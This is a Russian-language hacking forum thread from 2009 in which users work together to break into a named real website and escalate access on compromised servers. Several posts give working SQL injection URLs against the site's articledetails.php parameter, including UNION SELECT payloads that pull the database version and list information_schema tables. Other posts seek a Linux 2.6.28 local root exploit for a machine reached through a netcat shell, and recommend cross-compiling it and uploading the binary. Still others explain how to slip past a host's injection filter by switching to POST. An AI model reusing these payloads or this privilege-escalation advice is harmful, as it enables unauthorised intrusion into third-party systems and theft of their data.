Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.03.2009, 22:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1
Как эту расскрутить? Тут скобки фильтруются, чтоли?
|
|
|
19.03.2009, 22:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Да, режет скобки (обе) и звездочки тоже (причем граммотно режет, захексенные тоже)
Так, может пригодится:
http://www.steadygroup.com/articledetails.php?id=-314+or+1=0
http://www.steadygroup.com/articledetails.php?id=-314+or+1=1
В качестве фильтра вроде # катит
|
|
|
|
19.03.2009, 22:42
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от mailbrush
http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1
Как эту расскрутить? Тут скобки фильтруются, чтоли?
5 версия.... есть information_schema
PHP код:
http://www.steadygroup.com/articledetails.php?id=-314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,TABLE_NAME,28+FROM+information_schema.tables--+
|
|
|
|
19.03.2009, 22:42
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
А что, без скобок уже скули не модно крутить? 
http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28--
http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28+from+information_schema.tables-- |
|
|
|
20.03.2009, 01:17
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Сообщение от Imperou$
Подскажите плз сплоит под Linux 2.6.28.7, я чо то на милворме копаюсь и не могу найти... Или подойдёт любой под Linux 2.6.x ? Я просто ни разу не юзал =)
raptor_chown подойдёт (он вроде под 2.6.x)? И где можно скачать, ребяят.Отплюсую, ну оч надо.
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q= 2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8% D1%81%D0%BA&lr=
|
|
|
|
20.03.2009, 01:36
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Сообщение от ph1l1ster
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q= 2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8% D1%81%D0%BA&lr=
Ни одного под эту версию не увидел! Я гуглил по этому запросу, ничего толком не обнаружил, поэтому и спрашивал, необходим сплоит именно под версию Linux 2.6.28, или можно и 2.6.x ????
Так ничего и не вывалилось... =(
И ещё вопрос, забиндил, подконнектился неткатом, проверяю >
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?
Последний раз редактировалось Imperou$; 20.03.2009 в 02:32..
|
|
|
|
20.03.2009, 09:18
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Поищи тут http://milw0rm.com/search.php - введи в поиск Linux
http://milw0rm.com/exploits/5093
отпиши плз если получится каким сплойтом....
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?
если нет возможности скомпелировать на этой машине сплойт - можно на другой linux'овой машине. Да и в винде можно - лишь бы все библиотеки были. Есть такой компилятор lccwin32. им можно попробовать. Потом заливаешь бинарник и исполняешь. |
|
|
|
20.03.2009, 21:17
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Если хостер при вводе FROM перекидывает с сайту на траницу где бла бла бла вы хакер
Как можно обойти?
|
|
|
|
20.03.2009, 22:04
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Byrger
Не знаю как насчёт "бла бла бла вы хакер", но например СпейсВеб при реагирует на "union select from" и выбрасывает вот сюда:
http://sweb.ru/insecure
Это обходится POST, разумеется если это возможно.
Если ты о чём то другом, то нужно смотреть что именно фильтруется, пробовать POST, возможно фильтрация только с пробелом , как реагирует на регистр и т.д. Вариантов масса.
|
|
|
|
21.03.2009, 01:27
|
|
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме:
1031617
Репутация:
128
|
|
если открыл info.php что я могу оттуда почерпнуть для sql иньекции:
mysql
MySQL Support enabled
Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
